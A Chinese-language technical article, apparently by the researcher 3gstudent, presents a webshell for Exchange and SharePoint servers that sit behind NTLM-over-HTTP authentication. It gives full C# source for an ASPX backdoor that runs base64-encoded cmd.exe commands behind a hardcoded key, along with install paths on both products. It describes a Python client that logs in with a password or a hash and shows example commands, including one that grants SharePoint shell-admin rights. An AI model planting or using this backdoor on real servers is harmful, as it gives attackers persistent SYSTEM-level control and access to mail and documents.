[[385434]]

 0x00 前言

在某些環境下，訪問Web服務器的資源需要通過NTLM Over HTTP協議進行NTLM認證，而我們在這樣的Web服務器使用Webshell時，不僅需要考慮NTLM認證的實現，還需要滿足能夠在命令行下使用。

本文僅在技術研究的角度介紹一種實現方法，開源代碼，分享腳本開發細節。

0x01 簡介

本文將要介紹以下內容：

• 設計思路
•  腳本開發細節
•  開源代碼

0x02 設計思路

通過NTLM Over HTTP協議進行NTLM認證的Web服務器有很多，這里分別以Exchange和SharePoint為例

(1)Exchange測試環境

文件保存的絕對路徑：

C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\Autodiscover\test.aspx 

對應的URL為：

https://URL/Autodiscover/test.aspx 

(2)SharePoint測試環境

文件保存的絕對路徑：

C:\Program Files\Common Files\microsoft shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\test.aspx 

對應的URL為：

http://URL/_layouts/15/test.aspx 

訪問test.aspx時均需要通過NTLM Over HTTP協議進行NTLM認證

這里以一個支持cmd命令的webshell為例進行測試，webshell的地址為：

https://github.com/tennc/webshell/blob/master/aspx/asp.net-backdoors/cmdexec.aspx

如下圖

這個webshell需要通過瀏覽器進行操作，首先完成NTLM認證，接著填入正確的Auth Key和要執行的cmd命令。

我們的目標是滿足能夠在命令行下使用，可以以此為模板進行修改，設計思路如下：

(1)execCmd.aspx

接收Form表單請求作為參數，對Auth Key進行驗證

如果驗證失敗，返回空結果

如果驗證成功，執行傳入的cmd命令并返回執行結果

(2)aspxCmdNTLM.py

命令行腳本

首先通過NTLM Over HTTP協議完成NTLM認證，這里需要支持明文和用戶口令hash兩種登錄方式。

通過Form表單請求發送Auth Key和要執行的cmd命令，接收cmd命令的執行結果。

execCmd.aspx和aspxCmdNTLM.py的通信內容作Base64編碼，在程序實現上需要考慮Base64編碼和解碼。

0x03 腳本開發細節

1.execCmd.aspx

使用Page_Load方法接收Form表單請求，其中data1用作Auth Key，data2用作cmd命令。

Base64編碼的實現：

byte[] enbytes = Encoding.Default.GetBytes(string1);string string2 = Convert.ToBase64String(enbytes); 

Base64解碼的實現：

byte[] outbyte = Convert.FromBase64String(string1);string string2 = Encoding.Default.GetString(outbyte); 

完整的實現代碼如下：

< %@ Page Language="C#"% >< %@ Import namespace="System.Diagnostics"% >< %@ Import Namespace="System.IO"% >< script runat="server" >private const string AUTHKEY = "UGFzc3dvcmQxMjM0NTY3ODk";protected void Page_Load(object sender, EventArgs e)    {string data1 = Request.Form["data1"];if (data1 != AUTHKEY){return;}string data2 = Request.Form["data2"];byte[] outbyte = Convert.FromBase64String(data2);string payload = Encoding.Default.GetString(outbyte);string outstr1 = ExecuteCommand(payload);byte[] enbytes = Encoding.Default.GetBytes(outstr1);string outstr2 = Convert.ToBase64String(enbytes);Response.Write(outstr2);}private string ExecuteCommand(string command)    {try{ProcessStartInfo processStartInfo = new ProcessStartInfo();processStartInfo.FileName = "cmd.exe";processStartInfo.Arguments = "/c " + command;processStartInfo.RedirectStandardOutput = true;processStartInfo.UseShellExecute = false;Process process = Process.Start(processStartInfo);using (StreamReader streamReader = process.StandardOutput){string ret = streamReader.ReadToEnd();return ret;}}catch (Exception ex){return ex.ToString();}}< /script > 

2.aspxCmdNTLM.py

NTLM認證的實現可以參考之前的代碼：

https://github.com/3gstudent/Homework-of-Python/blob/master/checkEWS.py

• 支持明文和用戶口令hash兩種登錄方式
•  Form表單請求通過POST方式發送
•  Base64編碼和解碼需要注意字符串的格式

完整的代碼已上傳至github，地址如下：

https://github.com/3gstudent/Homework-of-Python/blob/master/aspxCmdNTLM.py

•  execCmd.aspx需要保存在Web服務器
•  aspxCmdNTLM.py在命令行下執行，連接execCmd.aspx執行cmd命令并獲得返回結果
•  aspxCmdNTLM.py支持明文和用戶口令hash兩種登錄方式
•  對于Exchange服務器，對應的Webshell權限為System

如下圖

可以直接調用Exchange PowerShell

命令示例：

python aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/Autodiscover/execCmd.aspx plaintext test.com user1 Password123! "powershell -c \"Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;;Get-MailboxServer\"" 

結果如下圖

對于SharePoint服務器，對應的Webshell權限為用戶權限

如下圖

可以嘗試調用SharePointServer PowerShell

命令示例：

python aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/Autodiscover/execCmd.aspx plaintext test.com user1 Password123! "powershell -c \"Add-PSSnapin Microsoft.SharePoint.PowerShell;Get-SPSite\"" 

這里需要注意，用戶需要配置為能夠訪問數據庫才能夠執行SharePointServer PowerShell命令

查看可訪問數據庫的用戶列表對應的Powershell命令如下：

Add-PSSnapin Microsoft.SharePoint.PowerShell;Get-SPShellAdmin 

添加指定用戶訪問數據庫權限對應的Powershell命令如下：

Add-PSSnapin Microsoft.SharePoint.PowerShell;Add-SPShellAdmin Domain\User1 

刪除指定用戶訪問數據庫權限對應的Powershell命令如下：

Add-PSSnapin Microsoft.SharePoint.PowerShell;Remove-SPShellAdmin Domain\User1 -Confirm:$false 

正常的結果如下圖

0x04 小結

本文以Exchange和SharePoint為例，介紹了支持NTLM Over HTTP協議的Webshell實現思路，開源代碼，分享腳本開發細節。

本文為 3gstudent 原創稿件，授權嘶吼獨家發布，如若轉載，請注明原文地址。